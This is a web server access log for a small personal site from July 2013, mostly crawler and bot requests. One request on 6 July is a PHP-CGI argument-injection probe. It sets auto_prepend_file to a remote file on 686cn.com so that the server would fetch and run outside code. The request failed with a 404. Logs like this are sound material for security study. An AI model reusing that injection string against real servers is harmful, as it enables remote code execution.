66.249.78.44 - - [01/Jul/2013:04:23:05 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.44 - - [01/Jul/2013:04:23:05 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.44 - - [01/Jul/2013:13:23:13 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.44 - - [01/Jul/2013:13:23:13 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.27.82.182 - - [01/Jul/2013:18:39:54 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
198.27.82.182 - - [01/Jul/2013:18:39:54 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
141.8.147.12 - - [01/Jul/2013:23:00:54 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [02/Jul/2013:03:14:47 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
38.100.21.62 - - [02/Jul/2013:19:47:25 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.62 - - [02/Jul/2013:19:47:26 +0200] "GET /seiten/impressum.html HTTP/1.1" 404 1256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.62 - - [02/Jul/2013:19:47:26 +0200] "GET /seiten/firma.html HTTP/1.1" 404 1256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.62 - - [02/Jul/2013:19:47:27 +0200] "GET /seiten/kontakt.php HTTP/1.1" 404 1256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.62 - - [02/Jul/2013:19:47:27 +0200] "GET /li_gre.html HTTP/1.1" 200 1973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.62 - - [02/Jul/2013:19:47:27 +0200] "GET /css/style.css HTTP/1.1" 404 1256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.62 - - [02/Jul/2013:19:47:27 +0200] "GET /seiten/projekte.html HTTP/1.1" 404 1256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.62 - - [02/Jul/2013:19:47:28 +0200] "GET /seiten/sitemap.html HTTP/1.1" 404 1256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.62 - - [02/Jul/2013:19:47:29 +0200] "GET /index.html HTTP/1.1" 200 4983 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.62 - - [02/Jul/2013:19:47:29 +0200] "GET /seiten/leistungen.html HTTP/1.1" 404 1256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.62 - - [02/Jul/2013:19:47:29 +0200] "GET /seiten/agb.html HTTP/1.1" 404 1256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
93.189.43.193 - - [03/Jul/2013:00:13:28 +0200] "GET //language/en-GB/en-GB.xml HTTP/1.1" 404 1256 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)"
141.8.147.12 - - [03/Jul/2013:06:22:31 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
180.76.5.67 - - [03/Jul/2013:12:25:22 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
141.8.147.12 - - [03/Jul/2013:12:51:43 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
198.27.82.187 - - [03/Jul/2013:14:53:00 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
198.27.82.187 - - [03/Jul/2013:14:53:00 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
183.62.48.38 - - [04/Jul/2013:01:30:21 +0200] "GET / HTTP/1.1" 200 4983 "-" "crawler4j (http://code.google.com/p/crawler4j/)"
141.8.147.12 - - [04/Jul/2013:12:39:39 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [04/Jul/2013:17:53:13 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
176.9.146.19 - - [05/Jul/2013:19:17:12 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.146.19 - - [05/Jul/2013:19:17:13 +0200] "GET / HTTP/1.1" 206 4983 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
85.25.134.59 - - [06/Jul/2013:16:34:06 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "http://netcomber.com" "NCBot (http://netcomber.com : tool for finding true domain owners) Queries/complaints: bot@netcomber.com"
85.25.134.59 - - [06/Jul/2013:16:34:06 +0200] "GET / HTTP/1.1" 200 4983 "http://netcomber.com" "NCBot (http://netcomber.com : tool for finding true domain owners) Queries/complaints: bot@netcomber.com"
201.102.40.141 - - [06/Jul/2013:20:20:16 +0200] "GET /phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation%3d1+-d+disable_functions%3d''+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp://686cn.com/1.txt+-n HTTP/1.1" 404 1256 "-" "MSIE9"
180.76.5.141 - - [07/Jul/2013:16:42:22 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
85.25.134.59 - - [08/Jul/2013:05:21:02 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "http://netcomber.com" "NCBot (http://netcomber.com : tool for finding true domain owners) Queries/complaints: bot@netcomber.com"
85.25.134.59 - - [08/Jul/2013:05:21:02 +0200] "GET / HTTP/1.1" 200 4983 "http://netcomber.com" "NCBot (http://netcomber.com : tool for finding true domain owners) Queries/complaints: bot@netcomber.com"
141.8.147.12 - - [08/Jul/2013:09:34:36 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [08/Jul/2013:14:24:22 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
54.227.74.172 - - [08/Jul/2013:16:20:10 +0200] "GET / HTTP/1.0" 200 4983 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
69.58.178.57 - - [08/Jul/2013:18:46:54 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1"
69.58.178.57 - - [08/Jul/2013:18:46:56 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1"
69.58.178.57 - - [08/Jul/2013:18:46:57 +0200] "GET / HTTP/1.1" 200 4983 "-" "BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 ips-agent"
69.58.178.57 - - [08/Jul/2013:18:46:58 +0200] "GET /index.html HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1"
69.58.178.57 - - [08/Jul/2013:18:46:59 +0200] "GET /seiten/firma.html HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1"
69.58.178.57 - - [08/Jul/2013:18:47:01 +0200] "GET /seiten/projekte.html HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1"
69.58.178.57 - - [08/Jul/2013:18:47:02 +0200] "GET /seiten/leistungen.html HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1"
69.58.178.57 - - [08/Jul/2013:18:47:03 +0200] "GET /seiten/kontakt.php HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1"
69.58.178.57 - - [08/Jul/2013:18:47:04 +0200] "GET /li_gre.html HTTP/1.1" 200 1973 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1"
69.58.178.57 - - [08/Jul/2013:18:47:05 +0200] "GET /seiten/impressum.html HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1"
69.58.178.57 - - [08/Jul/2013:18:47:06 +0200] "GET /seiten/agb.html HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1"
69.58.178.57 - - [08/Jul/2013:18:47:07 +0200] "GET /seiten/sitemap.html HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1"
64.246.165.180 - - [09/Jul/2013:11:50:43 +0200] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.180 - - [09/Jul/2013:11:50:43 +0200] "GET / HTTP/1.1" 200 4983 "http://whois.domaintools.com/familie-wilde.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
180.76.6.28 - - [09/Jul/2013:15:49:35 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
141.8.147.12 - - [10/Jul/2013:11:40:25 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [10/Jul/2013:12:47:43 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [11/Jul/2013:05:42:45 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
198.27.66.35 - - [11/Jul/2013:07:45:09 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
198.27.66.35 - - [11/Jul/2013:07:45:09 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
116.252.185.141 - - [11/Jul/2013:08:56:47 +0200] "GET / HTTP/1.1" 200 4983 "-" "Sosospider+(+help.soso.com/webspider.htm)"
180.76.6.17 - - [11/Jul/2013:11:24:55 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
141.8.147.12 - - [11/Jul/2013:11:50:59 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.163.89.240 - - [12/Jul/2013:05:53:36 +0200] "GET / HTTP/1.0" 200 4983 "http://www.familie-wilde.com/" "Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.10"
5.9.27.74 - - [12/Jul/2013:20:04:00 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
5.9.27.74 - - [12/Jul/2013:20:04:00 +0200] "GET / HTTP/1.1" 206 4983 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
66.249.78.44 - - [12/Jul/2013:20:07:41 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.44 - - [12/Jul/2013:20:07:41 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.151.39.42 - - [12/Jul/2013:22:07:02 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36"
69.64.32.217 - - [13/Jul/2013:07:05:53 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x4.90)"
180.76.5.145 - - [14/Jul/2013:04:39:14 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
141.8.147.12 - - [14/Jul/2013:07:34:17 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [14/Jul/2013:12:03:26 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
180.76.6.36 - - [15/Jul/2013:04:27:16 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
198.27.82.141 - - [15/Jul/2013:20:33:18 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
198.27.82.141 - - [15/Jul/2013:20:33:18 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
141.8.147.12 - - [17/Jul/2013:10:50:54 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [17/Jul/2013:17:21:40 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.135.125.179 - - [18/Jul/2013:13:18:52 +0200] "GET / HTTP/1.1" 200 4983 "-" "Opera/9.80 (X11; Linux i686; U; en) Presto/2.7.62 Version/11.00Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16"
5.135.125.179 - - [18/Jul/2013:13:18:54 +0200] "GET /seiten/impressum.html HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.2; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
5.135.125.179 - - [18/Jul/2013:13:18:55 +0200] "GET /seiten/sitemap.html HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
5.135.125.179 - - [18/Jul/2013:13:18:56 +0200] "GET /seiten/agb.html HTTP/1.1" 404 1256 "-" "Opera/9.80 (Windows NT 6.1 x64; U; en) Presto/2.7.62 Version/11.00"
5.135.125.179 - - [18/Jul/2013:13:18:57 +0200] "GET /seiten/firma.html HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0a2) Gecko/20111101 Firefox/9.0a2"
141.8.147.12 - - [19/Jul/2013:04:44:06 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [19/Jul/2013:12:36:51 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.9.112.67 - - [19/Jul/2013:19:35:41 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
5.9.112.67 - - [19/Jul/2013:19:35:41 +0200] "GET / HTTP/1.1" 206 4983 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
141.8.147.12 - - [20/Jul/2013:20:29:31 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [20/Jul/2013:20:30:02 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [21/Jul/2013:11:56:13 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [21/Jul/2013:23:57:19 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
64.246.165.150 - - [22/Jul/2013:04:28:21 +0200] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.150 - - [22/Jul/2013:04:28:21 +0200] "GET / HTTP/1.1" 200 4983 "http://whois.domaintools.com/familie-wilde.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
141.8.147.12 - - [22/Jul/2013:05:13:57 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
206.225.83.83 - - [22/Jul/2013:07:02:17 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
198.27.66.24 - - [22/Jul/2013:16:31:05 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
198.27.66.24 - - [22/Jul/2013:16:31:05 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
66.249.75.93 - - [23/Jul/2013:01:12:16 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.44 - - [23/Jul/2013:01:12:17 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.225.42.254 - - [23/Jul/2013:07:15:30 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2"
54.225.42.254 - - [23/Jul/2013:07:15:30 +0200] "GET /css/style.css HTTP/1.1" 404 1256 "http://www.familie-wilde.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2"
176.9.51.194 - - [23/Jul/2013:10:32:15 +0200] "GET / HTTP/1.1" 200 4983 "-" "Apache-HttpAsyncClient/4.0-beta4 (java 1.5)"
157.56.93.85 - - [24/Jul/2013:00:26:02 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.56.93.85 - - [24/Jul/2013:00:41:25 +0200] "GET /li_gre.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
141.8.147.12 - - [24/Jul/2013:05:34:01 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [24/Jul/2013:05:34:03 +0200] "GET /content/index.php?lang=3 HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [24/Jul/2013:05:40:00 +0200] "GET /content/index.php?lang=1 HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [24/Jul/2013:05:43:27 +0200] "GET /content/index.php?lang=2 HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [24/Jul/2013:05:43:36 +0200] "GET /content/index.php?lang=2 HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
85.25.137.24 - - [24/Jul/2013:18:20:31 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "http://ehname.com/familie-wilde.com" "EhName Domain Registry Protection Bot"
85.25.137.24 - - [24/Jul/2013:18:20:31 +0200] "GET / HTTP/1.1" 200 4983 "http://ehname.com/familie-wilde.com" "EhName Domain Registry Protection Bot"
141.8.147.12 - - [26/Jul/2013:03:01:47 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [26/Jul/2013:04:39:23 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [26/Jul/2013:09:47:15 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
182.64.190.154 - - [26/Jul/2013:11:06:58 +0200] "GET / HTTP/1.1" 200 4983 "-" "-"
182.64.180.135 - - [26/Jul/2013:11:14:55 +0200] "GET / HTTP/1.1" 200 4983 "-" "-"
144.76.71.241 - - [26/Jul/2013:17:45:46 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
144.76.71.241 - - [26/Jul/2013:17:45:46 +0200] "GET / HTTP/1.1" 206 4983 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
141.8.147.12 - - [28/Jul/2013:03:25:01 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.32.100 - - [28/Jul/2013:03:38:09 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.100 - - [28/Jul/2013:03:39:12 +0200] "GET /index.html HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
141.8.147.12 - - [28/Jul/2013:10:28:48 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
85.25.137.24 - - [28/Jul/2013:13:19:21 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "http://netcomber.com/familie-wilde.com?st=br" "NCBot (http://netcomber.com?st=ba : tool for finding true domain owners) Queries/complaints: bot@netcomber.com"
85.25.137.24 - - [28/Jul/2013:13:19:22 +0200] "GET / HTTP/1.1" 200 4983 "http://netcomber.com/familie-wilde.com?st=br" "NCBot (http://netcomber.com?st=ba : tool for finding true domain owners) Queries/complaints: bot@netcomber.com"
141.8.147.12 - - [28/Jul/2013:15:17:35 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [29/Jul/2013:05:34:27 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [29/Jul/2013:05:34:30 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
85.25.137.24 - - [29/Jul/2013:05:34:55 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "http://netcomber.com/familie-wilde.com?st=br" "NCBot (http://netcomber.com?st=ba : tool for finding true domain owners) Queries/complaints: bot@netcomber.com"
85.25.137.24 - - [29/Jul/2013:05:34:56 +0200] "GET / HTTP/1.1" 200 4983 "http://netcomber.com/familie-wilde.com?st=br" "NCBot (http://netcomber.com?st=ba : tool for finding true domain owners) Queries/complaints: bot@netcomber.com"
141.8.147.12 - - [29/Jul/2013:17:39:26 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
198.27.82.182 - - [30/Jul/2013:02:15:43 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
198.27.82.182 - - [30/Jul/2013:02:15:44 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
198.27.82.182 - - [30/Jul/2013:02:15:44 +0200] "GET /favicon.ico HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
198.27.82.182 - - [30/Jul/2013:02:15:44 +0200] "GET /apple-touch-icon.png HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)"
141.8.147.12 - - [30/Jul/2013:05:07:54 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [30/Jul/2013:11:48:46 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [30/Jul/2013:21:19:58 +0200] "GET /content/index.php?lang=3 HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [30/Jul/2013:21:20:04 +0200] "GET /content/index.php?lang=2 HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [30/Jul/2013:21:20:20 +0200] "GET /content/index.php?lang=1 HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [31/Jul/2013:10:16:44 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [31/Jul/2013:14:05:54 +0200] "GET / HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [31/Jul/2013:23:08:27 +0200] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"